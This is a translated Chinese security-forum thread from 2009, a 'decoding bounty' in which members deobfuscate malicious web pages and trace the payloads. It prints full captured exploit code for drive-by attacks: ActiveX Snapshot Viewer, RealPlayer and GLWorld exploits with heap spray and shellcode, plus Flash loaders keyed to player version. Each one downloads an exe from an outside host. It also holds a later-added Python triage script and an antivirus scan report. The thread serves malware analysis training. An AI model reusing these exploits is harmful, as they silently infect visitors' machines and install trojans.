Views: 3025 | Replies: 6

[Other] [Decoding Bounty][Round 10][Closed]

qianwenxiang
Posted on 2009-1-8 19:07:00
Purpose:
Let more people learn how to decode web trojans

Rules:
1. Hunters may not take part
2. All trojan addresses must be fully decoded; an incomplete decode of a URL nobody has decoded before earns points for the steps completed
3. Preferably attach the decoder tool's log; if there is none, post the concrete decoding steps
4. When the first person fully decodes an address, experience is awarded according to difficulty; once every URL is decoded this thread will be locked
5. If rules 1~2 are violated, this thread is locked immediately and any later successful decodes are void!
6. After locking, the addresses for this round will be changed and a new thread opened!
7. To keep to the purpose of the bounty thread, whoever succeeded yesterday and decodes today's addresses again receives only 70% of the experience for that address



Addresses to decode (replace HXXP with HTTP):

hXXp://www.yhahaz.cn/dfll/a39.htm (done)
Decoded in one go (with decoding steps) = 10 points (every iframe resolved to the exe address)
Partial (not fully decoded) = 2 points per step (some iframes or exe addresses resolved)

(4 steps in total / completed by 250662772 @ post 2; vistabull @ post 3)

hXXp://1ylpho.cn/ (done)
Decoded in one go (with decoding steps) = 33
Partial (not fully decoded) = 4 per step
(7 steps in total / completed by dearhaoji @ post 6)
*The pages involved differ from decode to decode, so the step count may vary, roughly 6~10 steps (the code fetched in the last step may randomly turn out to be from FakeAlert, Zlob and similar sites)
(there is a sneaky HTTP Referer check along the way..)

Validity:
> 代码: 读取代码:hXp://1ylpho.cn/
= 长度:140217成功
> 代码: 读取代码:http://www.yhahaz.cn/dfll/a39.htm
= 长度:388成功

Note: these addresses contain malware and may harm your computer. Do not open them directly; we accept no responsibility for any consequences!
Reference decoding tools:
FreShow (English),
Redoce 1.5 (Chinese), malzilla (English, but a truly divine tool)
http://glacierlk.cn/openlab/jm.htm
Reference decoding tutorials:
http://bbs.kafan.cn/viewthread.php?tid=387608
http://bbs.kafan.cn/viewthread.php?tid=220550

http://www.jimmyleo.com/share/FreShow!.rar (recommended! if you don't know how to use FreShow, have a look)


(Time limit = 1 day)(until 2008.01.09 19:00)
250662772
Posted on 2009-1-8 19:18:38
Web page analysis result as follows (250662772).
[wide]http://www.yhahaz.cn/dfll/a39.htm
    [frame]http://fhahag.cn/a39/fxx.htm
        [frame]http://fhahag.cn/a39/fx.htm
            [frame]http://fhahag.cn/a39/Ilink.html
            [frame]http://fhahag.cn/a39/flink.html
        [frame]http://fhahag.cn/a39/../a01/ss.htm
        [frame]http://fhahag.cn/a39/../a01/Ms06014.htm
        [frame]http://fhahag.cn/a39/../a01/sina.htm
            [object]http://down.ihahaj.cn/new/a01.css
        [frame]http://fhahag.cn/a39/../a01/no.htm
        [frame]http://fhahag.cn/a39/../a01/bfyy.htm
        [frame]http://fhahag.cn/a39/../a01/GLWORLD.html
            [object]http://down.ihahaj.cn/new/a01.css
        [frame]http://fhahag.cn/a39/../a01/real.htm
            [object]http://down.ihahaj.cn/new/a01.css
        [frame]http://fhahag.cn/a39/../a01/real.html
            [object]http://down.ihahaj.cn/new/a01.css
    [script]http://sj.tongji.cn.yahoo.com/860353/ystat.js

Rating (1 participant, experience +10): qianwenxiang +10, reason: bonus encouragement

XMatence
Posted on 2009-1-8 19:38:23

Reply to the post above

There's Flash too

Feels just like yesterday's

If my machine hadn't hung I'd have beaten you to it


关于:hxxp://www.yhahaz.cn/dfll/a39.htm解密的日志(自动模式 -  4):

AUTO>http://fhahag.cn/a39/fxx.htm

关于:hxxp://fhahag.cn/a39/fxx.htm解密的日志(自动模式 -  14):

AUTO>http://fhahag.cn/a01/sina.htm

<HTML><HEAD>
<SCRIPT type=text/javascript>

function rpppr()
{
return true;
}
window.onerror = rpppr;

var x;
var oootuso;
var tu_bj = new Array();
tu_bj[0] = "c:/Program Files/Outlook Express/wab.exe";
tu_bj[1] = "d:/Program Files/Outlook Express/wab.exe";
tu_bj[2] = "e:/Program Files/Outlook Express/wab.exe";

var p33333s333333spspq = new ActiveXObject("\x73\x6e\x70\x76\x77\x2e\x53\x6e\x61\x70\x73\x68\x6f\x74 \x56\x69\x65\x77\x65\x72\x43\x6f\x6e\x74\x72\x6f\x6c\x2e\x31");

if(p33333s333333spspq="[object]")
{

setTimeout('window.location = "ldap://"',3000);

for (x in tu_bj)
{
oootuso = new ActiveXObject("\x73\x6e\x70\x76\x77\x2e\x53\x6e\x61\x70\x73\x68\x6f\x74 \x56\x69\x65\x77\x65\x72\x43\x6f\x6e\x74\x72\x6f\x6c\x2e\x31")

var tuf1 = 'http://down.ihahaj.cn/new/a01.css';
var tuf2=tu_bj[x];

oootuso.Zoom = 0;

oootuso.ShowNavigationButtons = false;

oootuso.AllowContextMenu = false;

oootuso.SnapshotPath = tuf1;


try
{
oootuso["\x43\x6f\x6d\x70\x72\x65\x73\x73\x65\x64\x50\x61\x74\x68"] = tuf2;
oootuso["\x0050\x0072\x0069\x006e\x0074\x0053\x006e\x0061\x0070\x0073\x0068\x006f\x0074"]();
}catch(e){}

}
}

</SCRIPT>

<META content=VFPEUAGBSX name=SKYPE_FRAMEID>
<META content=VFPEUAGBSX name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY><BR><BR><BR><BR></BODY></HTML>

download http://down.ihahaj.cn/new/a01.css

over

AUTO>http://fhahag.cn/a01/ms06014.htm

无法找到该页


AUTO>http://fhahag.cn/a01/ss.htm

无法链接

AUTO>http://fhahag.cn/a39/fxx.htm

<HTML><HEAD>
<SCRIPT>
document.write("<Iframe width=100 height=0 src=fx.htm></iframe>");
document.write("");
document.write("<Iframe width=100 height=0 src=../a01/ss.htm></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<Iframe width=100 height=0 src=../a01/Ms06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x65\x72\x2e\x44\x4c\x6f\x61\x64\x65\x72\x2e\x31");}
catch(m){};                     
finally{if(m!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a01/sina.htm></iframe>");}}
try{var n;var qxxxxx="dxac";var qxaaxx="aaaac";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("Downloader.DLoader.1");
document.write("<Iframe width=100 height=0 src=../a01/no.htm></iframe>");}}var ddddddddd="dddddddddds";
try{var b;
var ml=new ActiveXObject("MPS.StormPlayer");}
catch(b){};                     
finally{if(b!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a01/bfyy.htm></iframe>");}}
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                     
finally{var dxl="x";if(f!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a01/GLWORLD.html></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32"){var ammc="dsvb";
document.write('<iframe style=display:none src="../a01/real.htm"></iframe>');}
else
document.write('<iframe style=display:none src="../a01/real.html"></iframe>');
}
test();
document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";abc="dfdae";document.write("");var fkav="BS";var fkasaccv="BS";var fkaqfccv="BS";var fkaqjfccv="BS";
</SCRIPT>

<META content=KQXEEPJHVF name=SKYPE_FRAMEID>
<META content=KQXEEPJHVF name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY><IFRAME src="fx.htm" width=100 height=0></IFRAME><IFRAME src="../a01/ss.htm" width=100 height=0></IFRAME><IFRAME src="../a01/Ms06014.htm" width=100 height=0></IFRAME></BODY></HTML>

Loops back around

AUTO>http://fhahag.cn/a39/fx.htm

<HTML><HEAD>
<SCRIPT>
window["\x6f\x6e\x65\x72\x72\x6f\x72"]=function (){
return true;

}
function init(){var kdslsd="asdcbn";
window["\x73\x74\x61\x74\x75\x73"]="";

}window["\x6f\x6e\x6c\x6f\x61\x64"]=init;
if(document.cookie.indexOf("play=")==-1)
{var ppppvvvv="gppp";var expires=new Date();var spnbv="fdsfds";
expires.setTime(expires.getTime()+0*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
  
  document.write("");
  document.write("<IFrame src=Ilink.html width=100 height=0></iframe>");  
  document.write("");  
  
}
else {
  
  document.write("");  
  document.write("<iframe src=flink.html width=100 height=0></iframe>");var xfcx="xqc";
}}
var ksp="nishiyizhizhu";
</SCRIPT>

<META content=PUDOBPTIKJ name=SKYPE_FRAMEID>
<META content=PUDOBPTIKJ name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY><IFRAME src="Ilink.html" width=100 height=0></IFRAME></BODY></HTML>

Two more redirect hops


AUTO>http://fhahag.cn/a39/flink.html

<HTML><HEAD>
<SCRIPT src="swfobject.js" type=text/javascript></SCRIPT>

<META content=UDCJALXUMW name=SKYPE_FRAMEID>
<META content=UDCJALXUMW name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>
<DIV id=flashcontent>111</DIV>
<DIV id=flashversion>222</DIV>
<SCRIPT type=text/javascript>
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
  var fuckavp = "SB";
  var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent");
  var fgfdbdf = "wef";
}else if(version['rev']==64){
  var fuckavp = "SB";
  var hbbf = "wfvvvv";
  var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent");
  var djcshk="dscc";
}else if(version['rev']==47){
  var snjd="dsa";
  var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent")}else if(version['rev']==45){
  var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent")}else if(version['rev']==28){
  var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent")
}else if(version['rev']==16){
  var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent")
}else if(version['rev']>=124){
  if(document.getElementById){
   document.getElementById('flashversion').innerHTML=""
  }
}
}var fkav="BS";
</SCRIPT>
</BODY></HTML>

download ./f115.swf  ./f115.swf  ./f64.swf  ./f45.swf  ./f47.swf   ./f28.swf ./f16.swf

AUTO>http://fhahag.cn/a39/swfobject.js

not virus

AUTO>http://fhahag.cn/a39/+

空连接

AUTO>http://fhahag.cn/a39/ilink.html

<HTML><HEAD>
<SCRIPT src="swfobject.js"></SCRIPT>

<META content=OTPPUISUBX name=SKYPE_FRAMEID>
<META content=OTPPUISUBX name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>
<DIV id=flashcontent>111</DIV>
<DIV id=flashversion>222</DIV>
<SCRIPT type=text/javascript>
var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){
document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){
  var fuckavp = "DZ";
  var fuckaxp = "aa";
  var fuckaqp = "c";
  var so=new SWFObject("./i11"+"5.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent")
}else if(version['rev']==45){
  var fqdscc = "P";
  var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");
  var wevbhpa = "qrffc";
  so.write("flashcontent")
}else if(version['rev']==16){
  var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent")}else if(version['rev']==64){var hgds = "DZ";
  
  so=new SWFObject("\x2e\x2f\x69\x36\x34\x2e\x73\x77\x66","\x6d\x79\x6d\x6f\x76\x69\x65","\x30\x2e\x31","\x30\x2e\x31","\x39","\x23\x30\x30\x30\x30\x30\x30");
  var qwea = "qwecb";
  so.write("flashcontent")
}else if(version['rev']==28){
  var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent");
}else if(version['rev']==47){
  var fuckavpx = "DZ";
  var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");
  so.write("flashcontent")
}else if(version['rev']>=124){
  if(document.getElementById){
   var fisx="gf";
   document.getElementById('flashversion').innerHTML=""
  }
}
}
var fkav="BS";var fkaav="BS";
</SCRIPT>
</BODY></HTML>

download ./i11 5.swf ./i45.swf ./i16.swf  ./i28.swf  ./i47.swf

AUTO>http://fhahag.cn/a01/real.htm

<HTML><HEAD>
<META content=JNYGNRIKVI name=SKYPE_FRAMEID>
<META content=JNYGNRIKVI name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>/* */
<SCRIPT language=JavaScript>
function WQWWQeqq_RealPlayer_Exp_YingYing_Anhey_ssssssssssssssssssssssssssss()
{
var addr=["%75"+"%06%74"+"%04","%7f"+"%a5"+"%60","%4f"+"%71"+"%a4"+"%60","%63"+"%11"+"%08"+"%60","%63"+"%11"+"%04"+"%60","%79"+"%31"+"%01"+"%60","%79"+"%31"+"%09"+"%60","%51"+"%11"+"%70"+"%63"];
var user=navigator.userAgent["toLowerCase"]();
if(user["indexOf"]("msie 6")==-1&&user.indexOf("msie 7")==-1)
  return;
if(user.indexOf("nt 5.")==-1)
  return;
var WQWWQeqq;
RealplayerObj="IaEaRa"+"PaCatal.I"+"EaRaP"+"Catal.1";
WQWWQeqq = RealplayerObj;
WQWWQeqq_Anhey_Real_Exp_Send = new window["ActiveXObject"](RealplayerObj.replace(/a/g,""));
CuteRealVersion3s = "andhi";
RealVersion = WQWWQeqq_Anhey_Real_Exp_Send["PlayerProperty"]("PRODUCT"+"VERSION");
sdfdgdfg="";
cvbcbb=unescape(addr[0]);
for(i=0;i<32*148;i++)
sdfdgdfg+="S";
if(RealVersion.indexOf("6.0.14.")==-1)
{
  if(navigator.userLanguage.toLowerCase()=="zh-cn")
   ret=unescape(addr[1]);
  else if(navigator.userLanguage.toLowerCase()=="en-us")
   ret=unescape(addr[2]);
  else
   return;
}
else if(RealVersion=="6.0.14.544")
  ret=unescape(addr[3]);
else if(RealVersion=="6.0.14.550")
  ret=unescape(addr[4]);
else if(RealVersion=="6.0.14.552")
  ret=unescape(addr[5]);
else if(RealVersion=="6.0.14.543")
  ret=unescape(addr[6]);
else if(RealVersion=="6.0.14.536")
  ret=unescape(addr[7]);
else
  return;

if(RealVersion.indexOf("6.0.10.")!=-1)
{
  for(i=0;i<4;i++)
  sdfdgdfg=sdfdgdfg+cvbcbb;
  sdfdgdfg=sdfdgdfg+ret;
}
else if(RealVersion.indexOf("6.0.11.")!=-1)
{
  for(i=0;i<6;i++)
  sdfdgdfg=sdfdgdfg+cvbcbb;
  sdfdgdfg=sdfdgdfg+ret;
}
else if(RealVersion.indexOf("6.0.12.")!=-1)
{
  for(i=0;i<9;i++)
  sdfdgdfg=sdfdgdfg+cvbcbb;
  sdfdgdfg=sdfdgdfg+ret;
}
else if(RealVersion.indexOf("6.0.14.")!=-1)
{
  for(i=0;i<10;i++)
  sdfdgdfg=sdfdgdfg+cvbcbb;
  sdfdgdfg=sdfdgdfg+ret;
}

var Kfqq, Qqs="Fucking AntiVirus"; q343434w343f4344gs44g="LLLL\\XXXXXLD"; Kfqq = Qqs;
q12p23c34="";
q12p23c34=q12p23c34+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpf";
q12p23c34=q12p23c34+"KRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzM";
q12p23c34=q12p23c34+"Fv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPr";
q12p23c34=q12p23c34+"f5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqrwSMT";
q12p23c34=q12p23c34+"noeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEle";
q12p23c34=q12p23c34+"oWng2DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPf";
q12p23c34=q12p23c34+"cVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP";
q12p23c34=q12p23c34+"9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoSTPorWPnTn3Y2HSQ58PaaztnasPntorN3UQgFOPaP0P1tn1spsrSOpS0";C2="";
t999999p99999t=sdfdgdfg+q343434w343f4344gs44g+q12p23c34;
temp=0x8000;
while(t999999p99999t.length < temp) t999999p99999t+="lizhen";
var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\TestSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];
WQWWQeqq_Anhey_Real_Exp_Send["import"](arr1[Math.floor(Math["random"]()*6)], t999999p99999t, "123456456", 0, 0);
}
WQWWQeqq_RealPlayer_Exp_YingYing_Anhey_ssssssssssssssssssssssssssss();
var fkcxfdsmdf="cvcb";var ffdf="cvcb";var ffdeadf="cvcb";
</SCRIPT>
</BODY></HTML>

AUTO>http://fhahag.cn/a01/glworld.html

<HTML><HEAD>
<META content=QECDRHVQSU name=SKYPE_FRAMEID>
<META content=QECDRHVQSU name=SKYPE_FRAMEID>
<META id=skype_tb_marker_id content=metacontent name=SKYPE_PARSING_HAS_FINISHED></HEAD>
<BODY>
<OBJECT id=PlayBoy2008 classid=clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69></OBJECT>
<SCRIPT>
var tOx=window["unescape"](""+"%u54EB"+"%u758B"+"%u8B3C"+"%u3574"+"%u0378"+"%u56F5"+"%u768B"+"%u0320"+"%u33F5"+"%u49C9"+"%uAD41"+"%uDB33"+"%u0F36"+"%u14BE"+"%u3828"+"%u74F2"+"%uC108"+"%u0DCB"+"%uDA03"+"%uEB40"+"%u3BEF"+"%u75DF"+"%u5EE7"+"%u5E8B"+"%u0324"+"%u66DD"+"%u0C8B"+"%u8B4B"+"%u1C5E"+"%uDD03"+"%u048B"+"%u038B"+"%uC3C5"+"%u7275"+"%u6D6C"+"%u6E6F"+"%u642E"+"%u6C6C"+"%u4300"+"%u5C3A"+"%u2e55"+"%u7865"+"%u0065%uC033"+"%u0364"+"%u3040"+"%u0C78"+"%u408"+"B"+"%u8B0"+"C"+"%u"+"1C7"+"0%u8BA"+"D"+"%u084"+"0"+"%u09E"+"B%u408"+"B"+"%u8D3"+"4%"+"u7C4"+"0"+"%u408"+"B"+"%u953C"+"%u8EBF"+"%u0E4E"+"%uE8EC"+"%uFF84"+"%uFFFF"+"%uEC83"+"%u8304"+"%u242C"+"%uFF3C"+"%u95D0"+"%uBF50"+"%u1A36"+"%u702F"+"%u6FE8"+"%uFFFF"+"%u8BFF"+"%u2454"+"%u8DFC"+"%uBA52"+"%uDB33"+"%u5353"+"%uEB52"+"%u5324"+"%uD0FF"+"%uBF5D"+"%uFE98"+"%u0E8A"+"%u53E8"+"%uFFFF"+"%u83FF"+"%u04EC"+"%u2C83"+"%u6224"+"%uD0FF"+"%u7EBF"+"%uE2D8"+"%uE873"+"%uFF40"+"%uFFFF"+"%uFF52"+"%uE8D0"+"%uFFD7"+"%uFFFF"+"%u74"+"68"+"%u7074%u2f3a%u642f%u776f%u2e6e%u6869%u6861%u6a61%u632e%u2f6e%u656e%u2f77%u3061%u2e31%u7363%u0073");var tOxs="%u9090%u9090";var dadongx="qxcvbnm";var xLp=window["unescape"](tOxs);var xLps=0x40000;while(xLp["length"]<136)xLp+=xLp;xLpVips=xLp["substring"](0,136);xLpVip=xLp["substring"](0,xLp["length"]-136);while(xLpVip["length"]+136<xLps)xLpVip=xLpVip+xLpVip+xLpVips;okVips=new window["Array"]();for(x=0;x<300;x++)okVips[x]=xLpVip+tOx;var JiaoQiu='';while(JiaoQiu["length"]<4057)JiaoQiu=JiaoQiu+"\x0a\x0a\x0a\x0a";JiaoQiu=JiaoQiu+"\x0a";var lcfdfd="vc";JiaoQiu=JiaoQiu+"\x0a";JiaoQiu=JiaoQiu+"\x0a";JiaoQiu=JiaoQiu+"\x0a\x0a\x0a\x0a";JiaoQiu=JiaoQiu+"\x0a\x0a\x0a\x0a";PlayBoy2008["ChatRoom"](JiaoQiu);var kfjld="ds";</SCRIPT>

<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
</BODY></HTML>

AUTO>http://fhahag.cn/a01/bfyy.htm

can not find 404

AUTO>http://fhahag.cn/a01/no.htm

404

AUTO>http://down.ihahaj.cn/new/a01.css  

AUTO>http://sj.tongji.cn.yahoo.com/860353/ystat.js

not


AUTO>http://www.yhahaz.cn/dfll/a39.htm

<HTML><HEAD></HEAD>
<BODY><BR><BR><IFRAME src="http://fhahag.cn/a39/fxx.htm" width=100 height=0></IFRAME><BR><BR>
<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<BR><BR>
<SCRIPT src="http://sj.tongji.cn.yahoo.com/860353/ystat.js" type=text/javascript></SCRIPT>
<NOSCRIPT><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/860353/ystat.gif"/></a></NOSCRIPT></BODY></HTML>

Going round in circles again

AUTO>http://tongji.cn.yahoo.com  ●
fx.htm
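A static triage helper for landing pages like the ones in the log above, added here as an example; it is not code from the post, nor from FreShow, Redoce or malzilla. It undoes the \xNN escapes and the split string literals, then lists iframe targets, ActiveX ProgIDs and CLSIDs, the Flash-revision-to-SWF mapping and the heap-spray size, without fetching or executing anything. The sample HTML is constructed from fragments quoted in the log and the base URL is a placeholder host.

```python
import re
from urllib.parse import urljoin

# Constructed sample modelled on the fxx.htm / ilink.html / glworld.html
# fragments quoted in the log above; the base URL is a placeholder host.
BASE = "http://landing.example.invalid/a39/"
SAMPLE = r'''<HTML><HEAD><SCRIPT>
document.write("<Iframe width=100 height=0 src=fx.htm></iframe>");
document.write("<Iframe width=100 height=0 src=../a01/ss.htm></iframe>");
try{var hw=new ActiveXObject("\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x65\x72\x2e\x44\x4c\x6f\x61\x64\x65\x72\x2e\x31");}catch(m){}
var ml=new ActiveXObject("MPS.StormPlayer");
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
Like = new ActiveXObject(rrooxx);
if(version['rev']==115){var so=new SWFObject("./i11"+"5.swf","mymovie","0.1","0.1","9","#000000");}
else if(version['rev']==64){so=new SWFObject("\x2e\x2f\x69\x36\x34\x2e\x73\x77\x66","\x6d\x79\x6d\x6f\x76\x69\x65","0.1","0.1","9","#000000");}
var xLp=unescape("%u9090%u9090");var xLps=0x40000;while(xLp["length"]<xLps)xLp+=xLp;
</SCRIPT></HEAD><BODY>
<OBJECT id=PlayBoy2008 classid=clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69></OBJECT>
<IFRAME src="../a01/sina.htm" width=100 height=0></IFRAME></BODY></HTML>'''

_ESC = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")   # "\x44" / "\u0044"
_CONCAT = re.compile(r'"((?:[^"\\]|\\.)*)"\s*\+\s*"')            # "a" + "b"
_STR_ASSIGN = re.compile(r'\b(\w+)\s*=\s*"([^"]*)"\s*;')
_NUM_ASSIGN = re.compile(r'\b(\w+)\s*=\s*(0x[0-9a-fA-F]+|\d+)\s*;')
_ACTIVEX = re.compile(r'ActiveXObject\s*\(\s*(?:"([^"]*)"|(\w+))\s*\)')
_CLSID = re.compile(r'classid\s*=\s*"?clsid:([0-9A-Fa-f-]{36})', re.I)
_IFRAME = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']?([^\s"\'>]+)', re.I)
_SWF = re.compile(r"version\['rev'\]\s*==\s*(\d+).*?SWFObject\(\s*\"([^\"]+)\"", re.S)
_SPRAY = re.compile(r'while\s*\([^)]*length[^)]*<\s*(\w+)\s*\)')


def normalise(js: str) -> str:
    """Undo the two cheapest tricks seen in the log: \\xNN / \\uNNNN escapes
    inside string literals, and literals split with "+" to dodge signatures."""
    js = _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), js)
    prev = None
    while prev != js:                      # fold "a" + "b" + "c" to "abc"
        prev, js = js, _CONCAT.sub(r'"\1', js)
    return js


def triage(html: str, base: str) -> dict:
    """Pull out what an analyst reads from a landing page by hand: iframe
    targets, ActiveX ProgIDs/CLSIDs, the Flash-revision -> SWF map and the
    heap-spray target size. Purely textual: nothing is fetched or run."""
    js = normalise(html)
    strings = dict(_STR_ASSIGN.findall(js))   # resolves ActiveXObject(var)
    numbers = dict(_NUM_ASSIGN.findall(js))   # resolves while(len < var)
    progids = []
    for lit, var in _ACTIVEX.findall(js):
        name = lit or strings.get(var, f"<unresolved {var}>")
        if name not in progids:
            progids.append(name)
    m = _SPRAY.search(js)
    raw = numbers.get(m.group(1), m.group(1)) if m else ""
    spray_bytes = int(raw, 0) if re.fullmatch(r"0x[0-9a-fA-F]+|\d+", raw) else None
    return {
        "iframes": sorted({urljoin(base, s) for s in _IFRAME.findall(js)}),
        "progids": progids,
        "clsids": sorted(set(_CLSID.findall(js))),
        "swf_by_flash_rev": {int(r): urljoin(base, p) for r, p in _SWF.findall(js)},
        "heap_spray_bytes": spray_bytes,
    }
```

Calling triage(SAMPLE, BASE) yields the three iframe targets, the three ProgIDs (the split one reassembled as IERPCtl.IERPCtl.1), the CLSID, the revision-to-SWF map and a 0x40000-byte spray target. The concat folding does not cover the replace(/a/g,"") trick used in real.htm; that one still needs a hand decode.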
250662772
Posted on 2009-1-8 19:54:19
Originally posted by vistabull on 2009-1-8 19:38
There's Flash too

Feels just like yesterday's

If my machine hadn't hung I'd have beaten you to it


关于:hxxp://www.yhahaz.cn/dfll/a39.htm解密的日志(自动模式 -  4):

AUTO>http://fhahag.cn/a39/fxx.htm

关于:hxxp://fhahag.cn/a39/fx ...

You take the second one; I'm not decoding it, there's a pile of URLs and I'm not trying them one by one
qianwenxiang
Thread starter | Posted on 2009-1-8 22:57:38

TO post 3, vistabull

I hear Avast flags this thread, probably because of the code. I just changed the ; in your post to ; (last time that change made Avast stop complaining; not sure whether it'll work this time..)
dearhaoji
Posted on 2009-1-9 12:42:42
hxxp://1ylpho.cn/

hxxp://1ylpho.cn/currenthousebills.html

hxxp://1ylpho.cn/menu.js
which contains http://kogerta.com/in.cgi?3&seoref=    which in turn contains
http://dlsgd3.com/install.php?track_id=10107
The download turns into an exe, I suspect it's a virus..
It really is a virus!

File SpywareGuard2008.exe received on 01.09.2009 05:38:49 (CET)


Result: 10/37 (27.03%)

Antivirus Version Last Update Result
a-squared 4.0.0.73 2009.01.09 Rootkit.Win32.TDSS!IK
AhnLab-V3 2009.1.9.0 2009.01.08 -
AntiVir 7.9.0.45 2009.01.08 BDS/Hupigon.Gen
Authentium 5.1.0.4 2009.01.08 -
Avast 4.8.1281.0 2009.01.08 -
AVG 8.0.0.229 2009.01.08 -
BitDefender 7.2 2009.01.09 Trojan.TDss.AW
CAT-QuickHeal 10.00 2009.01.08 Win32.TrojanDropper.Dowque.A.4
ClamAV 0.94.1 2009.01.08 -
Comodo 895 2009.01.08 -
DrWeb 4.44.0.09170 2009.01.08 -
eSafe 7.0.17.0 2009.01.08 Suspicious File
eTrust-Vet 31.6.6299 2009.01.09 -
F-Prot 4.4.4.56 2009.01.08 -
F-Secure 8.0.14470.0 2009.01.09 -
Fortinet 3.117.0.0 2009.01.09 -
GData 19 2009.01.09 Trojan.TDss.AW
Ikarus T3.1.1.45.0 2009.01.09 Rootkit.Win32.TDSS
K7AntiVirus 7.10.582 2009.01.08 -
Kaspersky 7.0.0.125 2009.01.09 -
McAfee 5489 2009.01.08 -
McAfee+Artemis 5489 2009.01.08 -
Microsoft 1.4205 2009.01.08 Trojan:Win32/FakeSpyguard
NOD32 3752 2009.01.08 a variant of Win32/Kryptik.EH
Norman 5.99.02 2009.01.08 -
Panda 9.4.3.3 2009.01.08 -
PCTools 4.4.2.0 2009.01.08 -
Prevx1 V2 2009.01.09 -
Rising 21.11.40.00 2009.01.09 -
SecureWeb-Gateway 6.7.6 2009.01.09 Trojan.Backdoor.Hupigon.Gen
Sophos 4.37.0 2009.01.09 -
Sunbelt 3.2.1831.2 2009.01.09 -
Symantec 10 2009.01.09 -
TheHacker 6.3.1.4.214 2009.01.09 -
TrendMicro 8.700.0.1004 2009.01.09 -
